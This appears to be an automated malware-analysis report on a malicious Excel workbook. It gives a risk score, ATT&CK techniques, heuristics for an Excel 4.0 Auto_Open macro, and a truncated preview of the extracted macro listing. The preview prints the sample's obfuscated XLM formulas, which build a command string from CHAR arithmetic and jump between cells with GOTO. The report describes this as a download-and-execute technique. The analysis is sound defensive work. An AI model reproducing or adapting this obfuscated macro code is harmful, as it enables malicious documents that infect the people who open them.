MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous formula APIs like RUN. The macro attempts to construct a complex string using character code manipulation and then execute it, which is a common technique for downloading and executing a secondary payload. The specific string constructed by the macro is included as an IOC.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129108 bytes |
SHA-256: a11ebd3760f1fb3374f2ac38a2bfb6c740adc664470132d4d9bf7702f4c7c8f3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!CX23036 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,DV124,"",-24.00000000000000000000 ' Sheet,BU147,"",-509.00000000000000000000 ' Sheet,BW181,"",182.00000000000000000000 ' Sheet,EG231,"",-0.23310810810810811411 ' Sheet,EE247,"",7.54098360655737742775 ' Sheet,EI252,"",-2.61764705882352943789 ' Sheet,HJ309,"FORMULA.FILL(CHAR(E26375/CU47545)&CHAR(BX40654*ID20573)&CHAR(BX40654+DI35279)&CHAR(BX40654/FE1147)&CHAR(CN8556*FN2953)&CHAR(GI57090*DU62792)&CHAR(E26375*ES42083)&CHAR(BM1838-BK38302)&CHAR(DM57035-BU38310)&CHAR(JM28646/FD47857)&CHAR(DM57035+BY35098)&CHAR(BX40654/IR61854)&CHAR(BX40654+JJ1719)&CHAR(JM28646+CE24823)&CHAR(CY15265+IQ52261)&CHAR(BM1838/EG43978)&CHAR(DM57035*K39583)&CHAR(DM57035-IJ54876)&CHAR(DM57035/BJ3606)&CHAR(JM28646*HD60794)&CHAR(DM57035+HY25733)&CHAR(CY15265/ES57141)&CHAR(E26375-Z58947)&CHAR(DM57035-JD8631)&CHAR(CN8556-CP14663)&CHAR(BM1838*HS27586)&CHAR(BM1838/IY25450)&CHAR(GI57090/BG30422)&CHAR(CN8556/GW65322)&CHAR(E26375-IS60630),JL52384)","" ' Sheet,HJ310,GOTO(FH12662),"" ' Sheet,GM353,"",-7.21951219512195141448 ' Sheet,FH358,"",140.00000000000000000000 ' Sheet,JG470,"",-0.36486486486486485736 ' Sheet,H522,"",8.83168216831683317025 ' Sheet,EJ612,"SET.VALUE(CY15265,GET.CELL(50,HG9844)+-84.00000000000000000000-8)","" ' Sheet,EJ613,GOTO(BD11764),"" ' Sheet,HW666,"",-101.00000000000000000000 ' Sheet,E700,"",134.00000000000000000000 ' Sheet,CR801,"",10.79545454545454497008 ' Sheet,W864,"",372.00000000000000000000 ' Sheet,IB925,"",0.24409871244635192311 ' Sheet,GN957,"",-422.00000000000000000000 ' Sheet,IP990,"",489.00000000000000000000 ' Sheet,O1001,"SET.VALUE(EK33139,-461.00000000000000000000/4*GET.CELL(19,GR42631))","" ' Sheet,O1002,GOTO(DK44552),"" ' Sheet,JL1004,"",-438.00000000000000000000 ' Sheet,IK1016,"",0.16631578947368422239 ' Sheet,BQ1031,"",34.00000000000000000000 ' Sheet,HT1044,"",0.23578947368421052100 ' Sheet,FE1147,"",1.22413793103448265143 ' Sheet,IE1185,GOTO(C32525),"" ' Sheet,CN1186,"",255.80015624999998635758 ' Sheet,BS1203,"",-2.22500122070312489342 ' Sheet,GK1298,"",-1.83720930232558132822 ' Sheet,EX1301,"",0.27238805970149254643 ' Sheet,IW1358,"",-416.00000000000000000000 ' Sheet,ER1371,"",-145.00000000000000000000 ' Sheet,GP1377,"",110.00000000000000000000 ' Sheet,CM1437,"",0.22608695652173912971 ' Sheet,Z1466,"",-350.00000000000000000000 ' Sheet,HU1476,"",-3.18279569892473102044 ' Sheet,DD1485,"",384.00000000000000000000 ' Sheet,IZ1695,"",-269.00000000000000000000 ' Sheet,JJ1719,"",21.00000000000000000000 ' Sheet,IM1735,"",434.00000000000000000000 ' Sheet,JS1753,"",-7.68333333333333357018 ' Sheet,GS1823,"",0.85294117647058820264 ' Sheet,EQ1831,"",-96.00000000000000000000 ' Sheet,GE1860,"",33.00000000000000000000 ' Sheet,FF1908,"",0.86585365853658535773 ' Sheet,CG1916,"",-66.00000000000000000000 ' Sheet,JB1938,"",-268.00000000000000000000 ' Sheet,GM1973,"",0.37383177570093456543 ' Sheet,IV2003,"",0.10810810810810811411 ' Sheet,GX2156,"",480.00000000000000000000 ' Sheet,JF2156,"",-0.17229729729729728605 ' Sheet,GD2186,"",-135.00000000000000000000 ' Sheet,D2210,"",6.05660377358490542576 ' Sheet,EG2258,"",-477.00000000000000000000 ' Sheet,CH2267,"",-285.80015624999998635758 ' Sheet,IA2267,"",8.47272727272727266268 ' Sheet,EA2293,"",-350.00000000000000000000 ' Sheet,CO2366,"",0.80555555555555558023 ' Sheet,DL2393,"",379.00000000000000000000 ' Sheet,HI2430,"",361.00000000000000000000 ' Sheet,GY2434,"",228.00000000000000000000 ' Sheet,HK2518,"",-0.17905405405405405705 ' Sheet,GU2567,"",-8.43292682926829328949 ' Sheet,DQ2573,"",-139.00000000000000000000 ' Sheet,X2654,"FORMULA.FILL(CHAR ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.